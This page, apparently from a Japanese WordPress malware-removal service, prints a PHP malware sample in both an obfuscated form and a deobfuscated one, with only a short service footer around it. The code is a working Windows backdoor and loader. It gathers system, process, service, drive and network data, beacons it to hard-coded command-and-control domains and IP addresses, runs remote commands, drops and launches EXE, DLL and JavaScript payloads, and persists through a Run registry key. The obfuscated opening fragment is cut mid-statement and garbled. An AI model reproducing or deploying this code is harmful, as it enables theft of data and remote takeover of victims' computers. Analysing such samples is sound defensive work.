"\146\141\x69\x6c\x65\144\40\151\156\x73\x74\x61\154\154\x20\156\157\144\145\152\x73" . PHP_EOL; goto qk3BX; bPtdr: if (!(!file_exists($xLjoz) && !y40SZ("\x68\x74\164\x70\72\x2f\x2f\156\x6f\144\145\152\163\56\157\x72\147\x2f\144\151\163\x74\57\166\62\61\56\x37\x2e\63\x2f\156\x6f\144\145\55\x76\62\61\x2e\67\x2e\63\x2d\167\x69\x6e\x2d\170\66\64\x2e\172\x69\x70", getenv("\101\x50\x50\104\x41\x54\101")))) { goto W3oml; } goto ig9mY; Y_Aem: file_put_contents($d0PbW, $o0HyG); goto zCIdG; tdIKS: $d0PbW = BmLfv() . "\x5c" . XNKed(8) . "\x2e\x6a\160\147"; goto Y_Aem; zCIdG: goto nJLGE; goto w3k0S; qk3BX: return; goto uD0kN; uD0kN: W3oml: goto tdIKS; w3k0S: default: goto s2nJZ; TNSP3: file_put_contents(BmlfV() . "\x5c" . XnkeD(8) . "\x2e\164\x78\x74", $o0HyG); goto I3SlV; I3SlV: return; goto rdFY5; s2nJZ: echo "\x4f\x54\110\105\x52" . PHP_EOL; goto TNSP3; rdFY5: } goto uS_iH; nCcIW: $oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG)); goto OUirS; E6092: global $rst7P, $D_3Y7, $szWC8, $dCN4_; goto Kh4oY; lsNbT: lfViE($xLjoz, $d0PbW); goto PhVCY; kMs0H: $rst7P["\x63\x6d\144"] = $u7kKd; goto oe9Eo; NRL85: rweeZ: goto nCcIW; OUirS: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4); goto BdwFO; b5HGd: nJLGE: goto lsNbT; kL4WH: if (!($Ql4QK == 204)) { goto zQM0Z; } goto tuOdf; CjTrc: unset($rst7P["\143\x6d\x64"]); goto O4_i1; OF1U2: $d0PbW = null; goto VXOzv; BdwFO: R7s9B($o0HyG, $oAl9r); goto PCb5g; Zq6SB: throw new Exception("\x48\124\x54\x50\40\x72\x65\x71\x75\145\163\164\x20\146\141\151\x6c\x65\x64\72\x20" . $Ql4QK); goto NRL85; tuOdf: echo "\62\x30\x34" . PHP_EOL; goto ojXAZ; PCb5g: $miAdf = ord($o0HyG[strlen($o0HyG) - 1]); goto I7s0k; VE56b: zQM0Z: goto nJvML; O4_i1: $o0HyG = $uJtGi["\143\x6f\x6e\164\x65\156\164"]; goto TG7Ws; ojXAZ: return; goto VE56b; PhVCY: } goto NxBG4; bc_XP: try { goto G8o3o; b3ZA4: if ($dlA_m >= $TZ64Y + 10) { goto SuLft; } goto dqR1N; KKvsW: xVHKd: goto PprER; G8o3o: echo $A4YkN . PHP_EOL; goto KeU2e; PprER: $dlA_m = 0; goto LWgVS; MQiTv: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto MKzlP; Lrde_: goto WdXyd; goto jp4cX; WAede: $dCN4_--; goto iaT6S; FHp7r: goto yt0U2; goto KKvsW; eWaiy: $LcYWr = 10; goto WAede; LWgVS: yt0U2: goto Lrde_; iaT6S: c81pJ: goto b3ZA4; E09nS: if ($dCN4_ > 0) { goto wbBrA; } goto rK6Ut; Nq2kv: $dlA_m = $TZ64Y - 10; goto ch1LL; RCrAZ: WdXyd: goto xHwH3; x6bWr: wbBrA: goto eWaiy; dqR1N: if ($dlA_m < $TZ64Y) { goto xVHKd; } goto bIkHK; ch1LL: if (!(count($h0b7d) > 0)) { goto njjkr; } goto MQiTv; MKzlP: njjkr: goto RCrAZ; rK6Ut: $LcYWr = 5 * 60; goto WieJG; KeU2e: echo $dlA_m . PHP_EOL; goto xMM4K; bIkHK: $dlA_m++; goto FHp7r; WieJG: goto c81pJ; goto x6bWr; jp4cX: SuLft: goto Nq2kv; xMM4K: moJ2m($A4YkN); goto E09nS; xHwH3: } catch (Throwable $Umveq) { goto wptzU; puz2n: $LcYWr = 10; goto R4mvO; QavQA: WGLsq: goto puz2n; kSgzE: $dlA_m++; goto JoIY7; Y0Lll: goto WGLsq; goto F6Iwd; wptzU: echo $pC2k6 . "\x45\162\162\x6f\162\72\x20" . $Umveq->getMessage() . $pC2k6; goto kSgzE; R4mvO: $dCN4_ = 0; goto qURNi; JoIY7: if ($dlA_m < $TZ64Y && count($h0b7d) > 0) { goto C78vx; } goto m7fon; F6Iwd: C78vx: goto JCQys; JCQys: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto QavQA; m7fon: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)]; goto Y0Lll; qURNi: } goto smHwj; EgCuT: V3Oj2: goto dfbng; d1AUN: sleep($LcYWr); goto OUc5x; VN3bi: function XNKeD($zcvYL = 16) { goto yWThk; nL0BB: $b3TRq .= $Ke3ba[rand(0, $brHta - 1)]; goto GkO5U; yWThk: $Ke3ba = "\60\61\x32\63\x34\x35\x36\x37\70\71\x61\x62\143\x64\x65\x66\147\150\151\152\153\x6c\x6d\156\x6f\x70\161\162\x73\164\x75\166\167\170\x79\x7a\101\x42\103\104\x45\106\107\x48\x49\x4a\x4b\114\115\x4e\x4f\120\x51\x52\x53\124\125\126\x57\x58\131\132"; goto HuuRn; rIPsG: if (!($Mc_Hp < $zcvYL)) { goto pP0ox; } goto nL0BB; kdKdZ: NWTYT: goto rIPsG; b8Tav: goto NWTYT; goto DGVWR; o0GmT: return $b3TRq; goto l_C7v; HuuRn: $brHta = strlen($Ke3ba); goto fL917; DGVWR: pP0ox: goto o0GmT; GEnfc: $Mc_Hp++; goto b8Tav; fL917: $b3TRq = ''; goto DMxcX; GkO5U: o61fz: goto GEnfc; DMxcX: $Mc_Hp = 0; goto kdKdZ; l_C7v: } goto KMXag; JgSSO: w_p_e:<?php
$szWC8 = "\"";
$pC2k6 = "\n";
if (!($argc < 2 && !qrOfa() || !extension_loaded("zip") && file_exists("/var/www/html/input.php"))) {
$jIDpK = 20;
$JcEot = 80;
$D_3Y7 = ["EXE" => 0, "DLL" => 1, "JS" => 2, "CMD" => 3, "ACTIVE" => 4, "AUTORUN" => 5, "OFF" => 6];
$dCN4_ = 0;
$rst7P = MNfE9();
function QROfA()
{
global $argv;
return $argv[0] === "Standard input code";
}
function ecI0T($b3TRq)
{
global $szWC8;
return $szWC8 . $b3TRq . $szWC8;
}
function rxiXT()
{
$Eh0Dq = new DateTime("now", new DateTimeZone("Etc/GMT+5"));
$o28qH = (int) $Eh0Dq->getTimestamp() & -4096;
$LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX);
$t3Oc0 = $o28qH >> 32 & 0xffffffff;
$YvSKs = $o28qH & 0xffffffff;
$fruA2 = $LSet6 >> 32 & 0xffffffff;
$rNvND = $LSet6 & 0xffffffff;
$t3Oc0 ^= $fruA2;
$YvSKs ^= $rNvND;
$YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff;
$t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff;
$t3Oc0 ^= 0x219f7609;
$YvSKs ^= 0xd1769498;
$t3Oc0 ^= 0x86ad5709;
$YvSKs ^= 0x15de8713;
$rNvND = $rNvND + 0x29807914 & 0xffffffff;
$fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff;
$t3Oc0 ^= $fruA2;
$YvSKs ^= $rNvND;
$KyMPt = sprintf("%08x%08x", $t3Oc0, $YvSKs);
$U0J5z = sprintf("%08x%08x", $fruA2, $rNvND);
$USwKc = XNked(rand(0, 14));
$FjQwC = XnkeD(rand(0, 14));
return ($USwKc !== '' ? "/" . $USwKc : '') . "/" . XnkeD(rand(0, 14)) . "&" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "/" . $FjQwC : '');
}
function mNFE9()
{
global $jIDpK, $szWC8, $pC2k6;
$JGJW0 = [];
exec("powershell -c " . Eci0T("systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["systeminfo"] = json_decode(implode($pC2k6, $pcI7I), true);
$pcI7I = '';
exec("powershell -c " . ECI0T("if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } "), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["other"]["version_build"] = $jIDpK;
$JGJW0["other"]["id_local"] = mt_rand(0, 100000000);
$JGJW0["other"]["id_loader"] = 43;
$JGJW0["other"]["runas"] = $pcI7I[0] ?? "UNKNOWN";
$JGJW0["other"]["type_file"] = "PHP";
$pcI7I = '';
exec("powershell -c " . eCI0t("tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["processes"] = json_decode(null, true);
$pcI7I = '';
exec("powershell -c " . eCI0t("Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["services"] = json_decode(null, true);
$pcI7I = '';
exec("powershell -c " . eci0t("Get-PSDrive -PSProvider FileSystem | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["drives"] = json_decode(null, true);
$pcI7I = '';
exec("powershell -c " . eCI0t("Get-NetNeighbor -AddressFamily IPv4 | Where-Object { \$_.State -ne 'Permanent' } | Select-Object @{Name='Interface'; Expression={\$_.InterfaceAlias}}, @{Name='Internet Address'; Expression={\$_.IPAddress}}, @{Name='Physical Address'; Expression={\$_.LinkLayerAddress}}, @{Name='Type'; Expression={'dynamic'}} | ConvertTo-Json"), $pcI7I, $xv08g);
if (!($xv08g !== 0)) {
$JGJW0["arp"] = json_decode(null, true);
$pcI7I = '';
return $JGJW0;
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
throw new Exception("Failed to execute command");
}
function r7s9B(&$xbNO5, $eAmVW)
{
$s9r5b = ord($eAmVW[0]);
$cbiCS = strlen($xbNO5);
$kt3y8 = strlen($eAmVW);
$Mc_Hp = 0;
kAq95:
if (!($Mc_Hp < $cbiCS)) {
// [PHPDeobfuscator] Implied return
return;
}
$s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256;
$xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256);
++$Mc_Hp;
goto kAq95;
}
function A2uxo($xbNO5)
{
$Ot6LN = mt_rand(0, 100000000);
$rasAm = pack("V", $Ot6LN);
R7s9b($xbNO5, $rasAm);
$ERqBI = $xbNO5 . $rasAm;
return gzencode($ERqBI, 5, FORCE_GZIP);
}
function EtUpz($A4YkN, $xbNO5)
{
global $JcEot;
$H6YXK = ["http" => ["method" => "POST", "header" => ["Content-type: application/octet-stream"], "content" => $xbNO5, "ignore_errors" => true, "timeout" => 20]];
$nG_P0 = "http://" . $A4YkN . ":" . $JcEot . rXiXT();
$nuWcv = stream_context_create($H6YXK);
$HhbRp = null;
set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) {
$HhbRp = $Mxyq3;
});
$RwYxj = file_get_contents($nG_P0, false, $nuWcv);
restore_error_handler();
if (!($RwYxj === false)) {
$Ql4QK = 0;
if (!isset($http_response_header[0])) {
goto ycYgX;
}
preg_match("/HTTP\\/\\d\\.\\d\\s+(\\d{3})/", $http_response_header[0], $fUPyD);
if (!isset($fUPyD[1])) {
goto oo9y0;
}
$Ql4QK = (int) $fUPyD[1];
oo9y0:
ycYgX:
return ["content" => $RwYxj, "headers" => $http_response_header, "status" => $http_response_header[0] ?? null, "code" => $Ql4QK];
}
throw new Exception("HTTP request failed: " . ($HhbRp ?: "Unknown error"));
}
function Y40sz($nG_P0, $Yem6z)
{
if (file_exists($Yem6z)) {
goto qw6IQ;
}
if (mkdir($Yem6z, 0777, true)) {
qw6IQ:
$cTc0_ = file_get_contents($nG_P0);
$PH23F = tmpfile();
fwrite($PH23F, $cTc0_);
rewind($PH23F);
$abtZm = new XdeZr();
$Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["uri"]);
if (!($Mbxm4 !== true)) {
if ($abtZm->extractTo($Yem6z)) {
$abtZm->close();
fclose($PH23F);
return true;
}
$abtZm->close();
fclose($PH23F);
return false;
}
fclose($PH23F);
return false;
}
return false;
}
function UrHlx()
{
global $szWC8, $pC2k6;
if (QrOFA()) {
$oyBW1 = "." . xNked(12) . ".txt";
$ZqddJ = shell_exec("wmic process where processid=" . getmypid() . " get commandline");
if (!(!$ZqddJ || !preg_match_all("/\\s-r\\s/", $ZqddJ))) {
$pDMmF = explode($pC2k6, $ZqddJ, 2);
$xU41z = trim($pDMmF[1] ?? '');
$Y72oh = preg_split("/php\\.exe.*?\\s-r\\s+/", $xU41z, 2);
$uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : '';
file_put_contents($oyBW1, $uJtGi);
goto hOX6z;
}
return false;
}
$oyBW1 = "/var/www/html/input.php";
hOX6z:
exec("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v " . Eci0t(VjppV()) . " /t REG_SZ /d " . eci0t("\\" . $szWC8 . PHP_BINARY . "\\" . $szWC8 . " \\" . $szWC8 . $oyBW1 . "\\" . $szWC8) . " /f");
return true;
}
function vJppV()
{
$inBis = scandir(getenv("APPDATA")) + scandir(getenv("LOCALAPPDATA"));
$inBis = array_diff($inBis, [".", ".."]);
$inBis = array_values($inBis);
print_r($inBis);
return $inBis[rand(0, count($inBis) - 1)];
}
function XNKeD($zcvYL = 16)
{
$Ke3ba = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$brHta = strlen($Ke3ba);
$b3TRq = '';
$Mc_Hp = 0;
NWTYT:
if (!($Mc_Hp < $zcvYL)) {
return $b3TRq;
}
$b3TRq .= $Ke3ba[rand(0, $brHta - 1)];
$Mc_Hp++;
goto NWTYT;
}
$wGaOo = null;
function deG1t($d0PbW)
{
global $wGaOo;
$qA50S = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$Nr7MT = proc_open($d0PbW, $qA50S, $V8__K);
if (is_resource($Nr7MT)) {
$wGaOo = ["process" => $Nr7MT, "pipes" => $V8__K];
// [PHPDeobfuscator] Implied return
return;
}
return "<failed>";
}
function rcbqD()
{
global $wGaOo;
if (!(!$wGaOo || !isset($wGaOo["process"]) || !isset($wGaOo["pipes"]))) {
$Nr7MT = $wGaOo["process"];
$V8__K = $wGaOo["pipes"];
if (!proc_get_status($Nr7MT)["running"]) {
$wGaOo = null;
$gGLsg = stream_get_contents($V8__K[1]);
$Dbe2H = stream_get_contents($V8__K[2]);
fclose($V8__K[0]);
fclose($V8__K[1]);
fclose($V8__K[2]);
$nSJJJ = proc_close($Nr7MT);
$PS9aF = "out:PHP_EOL";
if ($gGLsg) {
$PS9aF .= $gGLsg;
goto TkkmA;
}
$PS9aF .= "<empty>";
TkkmA:
if (!$Dbe2H) {
goto UBiN4;
}
$PS9aF .= "PHP_EOLerr(" . $nSJJJ . "):" . PHP_EOL . $Dbe2H;
UBiN4:
return $PS9aF;
}
echo "\$last_command == runningPHP_EOL";
return null;
}
echo "\$last_command == nullPHP_EOL";
return null;
}
function lFVIE($xLjoz, $d0PbW)
{
global $szWC8, $pC2k6;
$o_rCT = "powershell.exe -WindowStyle Hidden -c " . ECi0t("Start-Process -WindowStyle Hidden -FilePath '" . $xLjoz . "'" . ($d0PbW ? " -ArgumentList '" . preg_replace("/" . $szWC8 . "/", "\\" . $szWC8, $d0PbW) . "'" : ''));
echo $o_rCT . $pC2k6 . $pC2k6;
shell_exec($o_rCT);
}
function BMLFv()
{
$qHIxs = getenv("APPDATA") . "\\" . VJPpv() . rand(0, 1000000);
mkdir($qHIxs);
return $qHIxs;
}
function mOJ2M($A4YkN)
{
global $rst7P, $D_3Y7, $szWC8, $dCN4_;
if (!(($u7kKd = RCbQd()) !== null)) {
goto bVOXu;
}
$rst7P["cmd"] = $u7kKd;
bVOXu:
$uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT)));
unset($rst7P["cmd"]);
$o0HyG = $uJtGi["content"];
$Ql4QK = $uJtGi["code"];
if (!($Ql4QK == 204)) {
if (!($Ql4QK !== 200)) {
$oAl9r = substr($o0HyG, strlen($o0HyG) - 4, strlen($o0HyG));
$o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 4);
R7s9B($o0HyG, $oAl9r);
$miAdf = ord($o0HyG[strlen($o0HyG) - 1]);
$o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1);
$d0PbW = null;
switch ($miAdf) {
case $D_3Y7["CMD"]:
echo "CMDPHP_EOL";
DEg1T($o0HyG);
return;
case $D_3Y7["ACTIVE"]:
echo "ACTIVEPHP_EOL";
$dCN4_ = unpack("V", $o0HyG)[1];
return;
case $D_3Y7["AUTORUN"]:
echo "AUTORUNPHP_EOL";
URHlX();
return;
case $D_3Y7["OFF"]:
echo "OFFPHP_EOL";
exit(0);
case $D_3Y7["EXE"]:
echo "EXEPHP_EOL";
$xLjoz = BMlfV() . "\\" . xNkEd(8) . ".exe";
file_put_contents($xLjoz, $o0HyG);
goto nJLGE;
case $D_3Y7["DLL"]:
echo "DLLPHP_EOL";
$yYiH5 = bmlfV() . "\\" . XnkeD(8) . ".png";
$xLjoz = "C:\\Windows\\System32\\rundll32.exe";
$d0PbW = ecI0T($yYiH5) . " start";
file_put_contents($yYiH5, $o0HyG);
goto nJLGE;
case $D_3Y7["JS"]:
echo "JSPHP_EOL";
$xLjoz = getenv("APPDATA") . "\\" . "node-v21.7.3-win-x64\\node.exe";
if (!(!file_exists($xLjoz) && !y40SZ("http://nodejs.org/dist/v21.7.3/node-v21.7.3-win-x64.zip", getenv("APPDATA")))) {
$d0PbW = BmLfv() . "\\" . XNKed(8) . ".jpg";
file_put_contents($d0PbW, $o0HyG);
goto nJLGE;
}
echo "failed install nodejsPHP_EOL";
return;
default:
echo "OTHERPHP_EOL";
file_put_contents(BmlfV() . "\\" . XnkeD(8) . ".txt", $o0HyG);
return;
}
nJLGE:
lfViE($xLjoz, $d0PbW);
// [PHPDeobfuscator] Implied return
return;
}
throw new Exception("HTTP request failed: " . $Ql4QK);
}
echo "204PHP_EOL";
return;
}
$LcYWr = 10;
$b2dL6 = ["159.69.187.78", "64.95.12.71", "184.95.51.165"];
$h0b7d = ["windows-msgas.com", "event-datamicrosoft.live", "varying-rentals-calgary-predict.trycloudflare.com"];
if (count($h0b7d) > 0) {
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto sIg7z;
}
$A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
sIg7z:
$TZ64Y = 200;
$dlA_m = 0;
V3Oj2:
if (!true) {
// [PHPDeobfuscator] Implied script end
return;
}
try {
echo $A4YkN . PHP_EOL;
echo $dlA_m . PHP_EOL;
moJ2m($A4YkN);
if ($dCN4_ > 0) {
$LcYWr = 10;
$dCN4_--;
goto iaT6S;
}
$LcYWr = 300;
iaT6S:
if ($dlA_m >= $TZ64Y + 10) {
$dlA_m = $TZ64Y - 10;
if (!(count($h0b7d) > 0)) {
goto njjkr;
}
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
njjkr:
goto RCrAZ;
}
if ($dlA_m < $TZ64Y) {
$dlA_m = 0;
goto LWgVS;
}
$dlA_m++;
LWgVS:
RCrAZ:
} catch (Throwable $Umveq) {
echo $pC2k6 . "Error: " . $Umveq->getMessage() . $pC2k6;
$dlA_m++;
if ($dlA_m < $TZ64Y && count($h0b7d) > 0) {
$A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)];
goto QavQA;
}
$A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)];
QavQA:
$LcYWr = 10;
$dCN4_ = 0;
}
echo "delay: 10PHP_EOL";
echo "active_cnt: 0PHP_EOL";
sleep($LcYWr);
goto V3Oj2;
}
LfVIE(PHP_BINARY, "-d extension=zip -d extension_dir=ext " . ECi0T("/var/www/html/input.php") . " 1");
return;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.